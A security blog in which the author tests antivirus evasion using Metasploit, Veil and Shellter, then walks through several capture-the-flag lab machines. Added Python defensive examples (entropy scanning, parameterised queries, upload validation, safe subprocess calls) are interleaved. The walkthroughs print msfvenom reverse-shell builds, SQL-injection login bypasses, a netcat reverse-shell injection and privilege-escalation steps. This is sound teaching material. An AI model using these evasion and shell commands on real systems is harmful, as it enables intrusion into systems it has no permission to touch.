Friday, 10 March 2017

VirusTotal challenge

Hello everyone,

Today I would like to present several methods of evading antivirus detection.

In this article I will use a couple of tools: Metasploit, Shellter and Veil-Evasion.

The article will conclude with a comparison of how effective the generated payloads are at evading detection.

1. Metasploit Framework
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
 I think that is a poor result: 43/59 AV engines flagged our payload as malicious.

Let's try to generate the same payload, but with encoding.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
 The same poor result.

Now, let's try to inject our malicious payload into another program.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
 Better, but it still doesn't suit us.

  • cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
    cp /usr/share/windows-binaries/Hyperion-1.0.zip .
    unzip Hyperion-1.0.zip
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
    wine hyperion.exe ../backdoor.exe ../crypted.exe

 Hmmm, still too high a detection ratio.

2. Veil-evasion
Veil-Evasion is a very useful tool which is compatible with Metasploit payloads.

Let's list the payloads.

Good, let's use payload 35, for example.
 Quite nice! The detection ratio is lower than 50%.

3. Shellter
Shellter is the most effective tool for bypassing AV detection. Shellter takes a non-malicious program such as putty.exe and injects the malicious instructions into it.

We can use the A (automatic) mode. Next we have to set the PE target, the file into which we will inject.
 Great! For me the detection ratio is very low, isn't it?

As we can see, Shellter is a very effective tool for AV evasion.

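The crypter step above is a good place to look at this from the defender's side. Packing or encrypting a PE body leaves a measurable trace: the encrypted section has near-random byte statistics, so its Shannon entropy approaches the 8 bits/byte maximum, far above what compiled code or string tables normally reach. The script below is an added example, not part of the original post and not code from Hyperion, Veil or Shellter; it parses a PE file's section table with nothing but the standard library and flags high-entropy sections. The 7.2 cut-off, the build_test_pe() helper and the two sample images are constructed for the demonstration; pe_sections() can be pointed at bytes read from a real file.

```python
import math
import random
import struct
from typing import Dict, List

# Cut-off above which a section is reported as likely packed or encrypted.
# Plain compiled code typically sits well below 7 bits/byte; crypter output
# approaches the 8.0 maximum. The 7.2 value is an assumption made for this example.
HIGH_ENTROPY = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes) -> List[Dict]:
    """Walk the PE headers (e_lfanew -> PE signature -> COFF header -> section table)
    and return each section's name, raw size and the entropy of its raw data."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, num_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + size_opt
    sections = []
    for i in range(num_sections):
        # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        name, _, _, raw_size, raw_ptr, *_ = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        data = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "size": raw_size,
            "entropy": round(shannon_entropy(data), 3),
        })
    return sections


def suspicious_sections(pe: bytes, threshold: float = HIGH_ENTROPY) -> List[str]:
    """Names of non-empty sections whose entropy is at or above the cut-off."""
    return [s["name"] for s in pe_sections(pe) if s["size"] and s["entropy"] >= threshold]


def build_test_pe(sections: Dict[str, bytes]) -> bytes:
    """Assemble a minimal PE32 image (headers + section table + raw data) around the
    given section contents. Constructed test data only: it is not a runnable program."""
    e_lfanew, size_opt = 0x40, 0xE0
    header_len = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = (header_len + 0x1FF) & ~0x1FF          # first section on a 0x200 boundary
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    table, body = b"", b""
    for name, data in sections.items():
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), 0x1000,
                             len(data), raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
    image = bytes(dos) + b"PE\0\0" + coff + b"\0" * size_opt + table
    return image + b"\0" * (raw_ptr - len(image)) + body


def sample_images() -> Dict[str, bytes]:
    """Two constructed images: 'plain' carries repetitive code-like bytes, 'crypted'
    carries deterministic pseudo-random bytes standing in for crypter output."""
    rng = random.Random(1)
    code_like = b"\x55\x8b\xec\x83\xec\x10\x90\x90\xc3" * 400
    random_like = bytes(rng.getrandbits(8) for _ in range(4096))
    rdata = b"Hello, world\0" * 64
    return {
        "plain": build_test_pe({".text": code_like, ".rdata": rdata}),
        "crypted": build_test_pe({".text": random_like, ".rdata": rdata}),
    }


if __name__ == "__main__":
    for label, image in sample_images().items():
        for s in pe_sections(image):
            print(f"{label:8s} {s['name']:8s} {s['size']:6d} bytes  entropy {s['entropy']:.3f}")
        print(f"{label:8s} flagged: {suspicious_sections(image) or 'none'}")
```

The check is a heuristic: legitimate installers and compressed resources also score high, so it belongs in a triage pipeline next to other signals rather than as a verdict on its own.
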
Monday, 13 February 2017

DC146:2016 dick dastardly

Hello,

Now it is the dick dastardly challenge's turn!

Scanning all ports...

Enumerating web pages

Excellent! The dirb scanner found several interesting files on our target.
The admin.php page redirects us to index.php

Very interesting. Filling in admin as the username and ' OR 1=1 -- - as the password, we got the following result

Nice! Now we are able to use sqlmap and try to find valid credentials.

Good, let's enumerate deeper! Unfortunately we are not able to retrieve the database names, so we have to look for another way to get them.

Excellent! We found a second vulnerable parameter. Let's enumerate the databases.

Very good, let's examine the vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+
It is not a valid SSH password for the rasta user :( I don't know what the password is for.
After clicking on "add IP to IRC whitelist" I performed the nmap scan again and got a very interesting result

Very good! I installed irssi on my attacker machine and connected to the target's IRC.

Thursday, 9 February 2017

DC146:2016 fortress challenge

Hello,
Now it is time to struggle with the fortress challenge.

The scanning phase gave us the following result

Our situation is very simple, with only three open ports.
So, let's begin our penetration test with the web application.

Excellent! We discovered the scanner.php file. Let's examine it.

OK, we know how this scanner works. We know what the nmap command utilized by the scanner looks like.

We added id, so let's verify what the result looks like.

Excellent! It works. So, let's try to examine the target deeper.

Great! We got something like one line from /etc/shadow.
After a lot of time...
$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?
Good, so we know that the SSH port is open.

We obtained a limited shell! Unfortunately the goal of this challenge is only to find the flags.

Flag #1
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
$ pwd
/usr/home/craven
Flag #2
Looking for the next flag, I found it in the /usr/local/www/ directory
$ ls
index.html    k1ngd0m_k3yz    logo.png    s1kr3t        scanner.php    styles.css
$ cd s1kr3t/
$ ls
flag.txt
$ cat flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag #3
The last flag is located in the /home/vulnhub/ directory
$ ls
flag.txt    reader
$ cat flag.txt
cat: flag.txt: Permission denied
Hmmm, that is no surprise to me :-) So, let's examine the reader file
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ./reader
./reader [file to read]
Very useful! We know that we are able to read some files using the reader binary.
$ ./reader /etc/passwd
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
Hmmm, a little strange.
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
Hmmm, let's try to create a symlink to flag.txt
$ ln -s flag.txt /tmp/flagg.txt
$ ./reader /tmp/flagg.txt
Checking file type...
Symbolic links not allowed!
Grrrr, maybe a hard link will lead us to success?
$ ln -f flag.txt /tmp/flagh.txt
$ ./reader /tmp/flagh.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
$ ln -f flag.txt /tmp/test
$ ./reader /tmp/test
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
That is the end of the challenge :)
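The reader binary above rejects symlinks and then refuses files by name, which a hard link under a different name walks straight past: a hard link is just another directory entry for the same inode. The Python example below is added here and is not the challenge's reader. read_name_checked() reproduces the observed behaviour, while read_identity_checked() compares the (device, inode) identity of the file it actually opened against the protected file, which is identical for every hard link. The temporary directory, file names and flag text are constructed for the demonstration.

```python
import os
import stat
import tempfile
from typing import Dict, Tuple


def read_name_checked(path: str, forbidden: str = "flag") -> str:
    """Mirrors the checks the walkthrough observed: refuse symlinks, then refuse by
    *name*. The transcript suggests a substring match (flagh.txt was refused, test was
    not), so that is what is reproduced here. A hard link under another name passes."""
    if stat.S_ISLNK(os.lstat(path).st_mode):
        raise PermissionError("Symbolic links not allowed!")
    if forbidden in os.path.basename(path):
        raise PermissionError("Nope. Can't let you have the flag.")
    with open(path, "rb") as f:
        return f.read().decode()


def file_identity(fd: int) -> Tuple[int, int]:
    """(device, inode) of an open descriptor. Every hard link to a file shares this
    identity, whatever the directory entry was called."""
    st = os.fstat(fd)
    return st.st_dev, st.st_ino


def read_identity_checked(path: str, protected: str) -> str:
    """Hardened: open first (O_NOFOLLOW rejects symlinks in the kernel), then compare
    the identity of the file actually opened with the protected file. Deciding on the
    descriptor rather than the path also removes the check-then-use window."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        pfd = os.open(protected, os.O_RDONLY | os.O_NOFOLLOW)
        try:
            if file_identity(fd) == file_identity(pfd):
                raise PermissionError("Nope. Can't let you have the flag.")
        finally:
            os.close(pfd)
        return os.read(fd, 1 << 16).decode()      # small files only; enough for the demo
    finally:
        os.close(fd)


def make_fixture() -> Dict[str, str]:
    """Constructed layout in a temp dir: flag.txt, a hard link 'test' and a symlink
    'flagg.txt' to it, plus an unrelated readable file."""
    d = tempfile.mkdtemp()
    names = {"flag": "flag.txt", "hard": "test", "sym": "flagg.txt", "other": "notes.txt"}
    paths = {k: os.path.join(d, v) for k, v in names.items()}
    with open(paths["flag"], "w") as f:
        f.write("FLAG{constructed_sample}")
    with open(paths["other"], "w") as f:
        f.write("not the flag")
    os.link(paths["flag"], paths["hard"])
    os.symlink(paths["flag"], paths["sym"])
    return paths


def attempt(reader, *args) -> str:
    """Run a reader and return its content or the refusal, for side-by-side comparison."""
    try:
        return reader(*args)
    except OSError as e:                           # PermissionError is an OSError too
        return f"refused: {e}"


if __name__ == "__main__":
    fx = make_fixture()
    for label in ("flag", "sym", "hard", "other"):
        print(f"{label:6s} name-based     : {attempt(read_name_checked, fx[label])}")
        print(f"{label:6s} identity-based : {attempt(read_identity_checked, fx[label], fx['flag'])}")
```

Comparing identities on the opened descriptor rather than on the path also means that swapping the file between the check and the read cannot change the outcome.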

Tuesday, 24 January 2017

DC146:2016 basement challenge

Hello,

Today I would like to present the dc416-2016-basement challenge walkthrough.

Nmap port scanning.

Looking for our target, we discovered that the machine has been assigned the IP address 192.168.253.30.

Now, let's try to check what kind of services our target serves.

OK, the nmap scan discovered 4 open ports. We can see that the target uses port 8080 as an HTTP proxy. Hmmm, interesting.

Let's begin our penetration test with port 80 (HTTP).

I ran DirBuster, but it didn't find anything interesting or useful... So let's check what is hosted on port 10000.

Hmmm, maybe we should try to play with it via netcat?

Probably what is running on port 10000 is something like ping -c [number of packets] 127.0.0.1.

Maybe we will be able to inject a command to obtain a reverse shell.
To do that, we have to import os.system, so let's do that!

Very good, we executed the id command on the victim's OS.

We are able to obtain a reverse shell using __import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')

Excellent! We have got a limited shell.
jack@basement:~$ ls
ls
flag.txt  ping.py  run_ping.sh
jack@basement:~$ cat flag.txt
cat flag.txt
flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}
Good :)


Friday, 13 January 2017

HackDay Albania 2016

Hello,

Description
This was used in HackDay Albania's 2016 CTF.

Scanning phase
Our nmap scan shows us that our target has been assigned the address 192.168.56.101.

So, looking at the host deeper, we can see that there are a couple of open ports.

Good, let's begin our penetration test with port 8008.

Nice picture. Let's look at the robots.txt file
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
Good, let's add these paths to a dictionary of sorts and run DirBuster.

Hmmm, /unisxcudkqjydw/ has a smaller response size than the others. So, let's look at this path deeper.

OK, let's examine /vulnbank/

Great! Clicking on the client/ directory

Excellent! But we don't know valid credentials. Unfortunately the default credentials don't work... Let's try the SQL injection technique.

And indeed, very interesting, isn't it? Trying admin' || 1=1 # as the username and abcd as the password, we are logged in!

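Both login bypasses in this series (' OR 1=1 -- - on the dick dastardly admin page and admin' || 1=1 # against vulnbank above) work for the same reason: the application splices the submitted values into the SQL text, so a quote in the input ends the string literal and the rest of the input is parsed as SQL. The Python/SQLite example below is added here and is not code from either challenge; the admins table, its single row and the password value are constructed for the demonstration. It shows the concatenated query being bypassed with the first payload and the parameterised version refusing it. The second payload relies on MySQL treating # as a comment and || as OR, so it is not exercised against SQLite.

```python
import sqlite3

# Constructed data: one admin row, shaped like the admins table the walkthrough dumped.
# A real application would store a salted password hash; a plain value is used here
# only so that the injection point is the sole difference between the two functions.
SCHEMA = """
CREATE TABLE admins (id INTEGER PRIMARY KEY, user TEXT NOT NULL, pass TEXT NOT NULL);
INSERT INTO admins (user, pass) VALUES ('rasta', 'constructed-sample-password');
"""


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database loaded with the constructed admins table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Login check assembled by string concatenation. The user controls the query text,
    so a password of  ' OR 1=1 -- -  closes the literal, appends  OR 1=1  to the WHERE
    clause and turns the rest of the statement into a comment."""
    query = ("SELECT id FROM admins WHERE user = '" + user
             + "' AND pass = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Same check with bound parameters: the driver sends the values separately from
    the SQL text, so quotes and comment markers in them are never parsed as SQL."""
    query = "SELECT id FROM admins WHERE user = ? AND pass = ?"
    return conn.execute(query, (user, password)).fetchone() is not None


def compare(user: str, password: str) -> dict:
    """Run both checks on the same input and report the outcomes side by side."""
    conn = make_db()
    try:
        return {"vulnerable": login_vulnerable(conn, user, password),
                "safe": login_safe(conn, user, password)}
    finally:
        conn.close()


if __name__ == "__main__":
    print("legitimate :", compare("rasta", "constructed-sample-password"))
    print("wrong pass :", compare("rasta", "guess"))
    print("injection  :", compare("admin", "' OR 1=1 -- -"))
```

Binding parameters is the fix; escaping the input by hand is not, because every database and every character set has its own corner cases.
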
Excellent, we are able to upload a file using the Browse button.
I tried to upload a *.php file, but I got a message that the application allows only picture extensions such as *.jpeg, *.jpg, etc...
So, let's change the extension of our PHP reverse shell from *.php to *.jpg.

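The upload bypass above (renaming a PHP file to .jpg) works because the application decides by extension alone. The Python example below is added here and is not the vulnbank application's code; the sample byte strings (a minimal JPEG header, the renamed PHP file and a JPEG/PHP polyglot) are constructed for the demonstration. It places the extension-only check next to a version that also requires the content to start with the declared type's magic bytes and to contain no script markers, and that assigns a server-chosen file name.

```python
from typing import Optional

# Declared image types and the leading bytes ("magic") a genuine file of that type starts with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Markers that have no business inside an image the server will store under its document root.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def _extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def extension_only_check(filename: str) -> bool:
    """The check the walkthrough defeated: it trusts nothing but the file name."""
    return _extension(filename) in ALLOWED_TYPES


def validate_upload(filename: str, data: bytes, max_size: int = 2_000_000) -> Optional[str]:
    """Hardened: return None if acceptable, otherwise the reason for rejection.
    The extension is only a claim; the content must match it and carry no script markers."""
    ext = _extension(filename)
    if ext not in ALLOWED_TYPES:
        return "extension not allowed"
    if len(data) > max_size:
        return "file too large"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return "content does not match declared type"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return "script marker found inside image"
    return None


def stored_name(filename: str, upload_id: int) -> str:
    """Server-chosen storage name: the client's name (and any path in it) is discarded;
    only the validated extension survives."""
    return f"{upload_id}.{_extension(filename)}"


# Constructed samples: a minimal JPEG header, a PHP file renamed to .jpg as in the post,
# and a polyglot that starts with JPEG magic but carries PHP inside.
TINY_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
PHP_RENAMED = b"<?php echo 'not an image'; ?>"
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<?php echo 'hidden'; ?>"


if __name__ == "__main__":
    samples = (("photo.jpg", TINY_JPEG), ("shell.jpg", PHP_RENAMED),
               ("poly.jpg", POLYGLOT), ("x.php", TINY_JPEG))
    for name, data in samples:
        print(f"{name:10s} extension-only: {extension_only_check(name)!s:5s} "
              f"hardened: {validate_upload(name, data)}")
```

Content checks of this kind catch the rename trick but not every image/PHP polyglot, so uploads should additionally be stored outside the document root, or in a directory where the web server does not execute scripts.
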
Using python3.5 -c "import pty;pty.spawn('/bin/bash')" we can spawn a shell.
Looking at config.php we can find

Unfortunately the databases don't hold any useful passwords for us.
Looking at /etc/passwd, we can see some useful information
-rw-r--rw- 1 root root 1623 Oct 22 17:21 /etc/passwd
Good, we are able to edit the passwd file, so we can add a user with a known password and root privileges.

Thursday, 12 January 2017

Wallaby's: Nightmare (1.0.2)

Hi,

Today I want to present Wallaby's: Nightmare (1.0.2) walkthrough.

Scanning phase

Good, we know that our target has been assigned the IP 192.168.56.100 or 192.168.56.101.
Let's try to investigate .101 deeper using the nmap scanner with the -p- -sV options.

Great, the result provided us with very juicy information such as the open ports and the versions of the services hosted on them.

Let's begin our penetration test with the web application.

Interesting, isn't it? Let's try using the test username.

Our username is used in the application, hmmm. Clicking on "Start the CTF!" we are redirected to a certain page

Nothing interesting? Let's look at the URL: we can utilize the page parameter to try LFI or RFI.

Bingo! This parameter is vulnerable to LFI! But unfortunately after this action I got...

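The LFI above comes from an include built straight from the page parameter, so ../ sequences walk out of the directory the application meant to serve from. The Python example below is an added illustration, not the challenge's own code: resolve_page_unsafe() reproduces the pattern, while resolve_page() maps the parameter through an allowlist of page names and then confirms that the resolved real path is still inside the pages directory. The directory layout, the page names and the secret.txt file are constructed for the demonstration.

```python
import os
import tempfile
from typing import Dict, FrozenSet

ALLOWED_PAGES: FrozenSet[str] = frozenset({"home", "about", "contact"})


def resolve_page_unsafe(pages_dir: str, page: str) -> str:
    """The pattern behind the walkthrough's LFI: the request parameter becomes part of a
    filesystem path with no check, so '../' sequences leave the pages directory."""
    return os.path.join(pages_dir, page)


def resolve_page(pages_dir: str, page: str, allowed: FrozenSet[str] = ALLOWED_PAGES) -> str:
    """Hardened: map the parameter through an allowlist (the server, not the client,
    chooses the extension), then confirm the resolved real path is still inside
    pages_dir, which also guards against a stray symlink in that directory."""
    if page not in allowed:
        raise ValueError("unknown page")
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the pages directory")
    return target


def make_fixture() -> Dict[str, str]:
    """Constructed layout: <root>/pages/home.php, <root>/secret.txt one level up, and a
    planted symlink <root>/pages/about.php -> ../secret.txt."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "home.php"), "w") as f:
        f.write("<h1>home</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("outside the pages directory")
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(pages, "about.php"))
    return {"root": root, "pages": pages}


def serve(resolver, pages_dir: str, page: str) -> str:
    """Resolve and read a page, returning the content or the reason it was refused."""
    try:
        with open(resolver(pages_dir, page), "rb") as f:
            return f.read().decode()
    except (ValueError, OSError) as e:
        return f"refused: {e}"


if __name__ == "__main__":
    fx = make_fixture()
    for page in ("home.php", "../secret.txt", "about.php"):
        print(f"unsafe   {page:15s}: {serve(resolve_page_unsafe, fx['pages'], page)}")
    for page in ("home", "../secret.txt", "home/../../secret.txt", "about", "mailer"):
        print(f"hardened {page:22s}: {serve(resolve_page, fx['pages'], page)}")
```

The allowlist does the real work; the realpath containment check is the second line of defence for the case where something inside the pages directory itself points elsewhere.
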
It's not an issue with my network connection :-( I am confused, so let's try using nmap again.

Wow! Port 80 is not open any more, but we can see that a new port has been opened: 60080! Let's investigate this port!

Looking for some useful URLs, I tried this URL address which I know

Bingo! There is also an LFI vulnerability! Trying to read /etc/shadow, I got no result.
I spent a lot of time searching for a method or files which I would be able to display, and I guessed the mailer file.

Interesting, let's look at the source code

Hmmm, in the source code we can see that the mailer file has a mail parameter. Let's play with it.

Excellent! The mail parameter can execute bash commands!

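The three command-execution findings in these posts (the nmap command built by scanner.php in fortress, the ping service on port 10000 in basement that evaluates its input, and the mail parameter above) share one root cause: a request value reaches an OS sink, an eval() or a shell command string, without being constrained to the shape it should have. The Python example below is added here and is not code from any of the challenges. It shows the eval() sink next to a strict integer parser, the shell-string sink next to an argv list built from validated values, and runs both execution paths; echo stands in for ping, nmap and mail so that the demonstration runs offline and prints exactly what the program received. The function names and the MAX_COUNT limit are choices made for this example.

```python
import ipaddress
import re
import subprocess
from typing import List

MAX_COUNT = 10
# RFC 1123 host name: labels of letters, digits and hyphens, not starting or ending with a hyphen.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def parse_count_unsafe(text: str) -> int:
    """The basement-style sink: the packet count goes through eval(), so any Python
    expression in the request is executed, not just a number. Kept only as the 'before' form."""
    return eval(text)


def parse_count(text: str) -> int:
    """Hardened: a small decimal integer in a fixed range, nothing else."""
    if not re.fullmatch(r"[0-9]{1,2}", text.strip()):
        raise ValueError("count must be a decimal integer")
    n = int(text)
    if not 1 <= n <= MAX_COUNT:
        raise ValueError(f"count must be between 1 and {MAX_COUNT}")
    return n


def validate_host(host: str) -> str:
    """Hardened: an IP literal or a plain DNS name. Shell metacharacters, spaces and
    leading hyphens (which a program would read as options) can never pass."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME.match(host):
        return host
    raise ValueError("invalid target")


def build_shell_string_unsafe(host: str, count: str, binary: str = "ping") -> str:
    """The scanner.php / mailer-style sink: request values spliced into one command
    string that a shell will parse, so ';', '|', '$( )' and friends are honoured."""
    return f"{binary} -c {count} {host}"


def build_argv(host: str, count: str, binary: str = "ping") -> List[str]:
    """Hardened: validated values placed into an argv list. No shell is involved, and
    each element reaches the program as a single literal argument."""
    return [binary, "-c", str(parse_count(count)), validate_host(host)]


def run_shell_string(cmd: str) -> str:
    """Execute via /bin/sh -c (shell=True): the vulnerable execution path."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(argv: List[str]) -> str:
    """Execute directly (execve semantics): nothing re-parses the arguments."""
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # 'echo' stands in for ping/nmap/mail so the demonstration runs anywhere and prints
    # exactly what the program received.
    tainted = "127.0.0.1; echo INJECTED"
    print(run_shell_string(build_shell_string_unsafe(tainted, "1", binary="echo")), end="")
    try:
        build_argv(tainted, "1", binary="echo")
    except ValueError as e:
        print("rejected by validation:", e)
    print(run_argv(["echo", "-c", "1", tainted]), end="")
```

The validation and the argv form are complementary: the allowlist stops bad values at the door, and execution without a shell means that anything which did slip through would still arrive as one inert argument.
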
Great! We have a limited shell! Let's investigate what kind of privileges we have.

Good, we have full control over the firewall, so let's flush the rules.

OK, let's try to connect to the IRC (port 6667) which was filtered before our action.
Now we are able to connect to the IRC.

[TBU]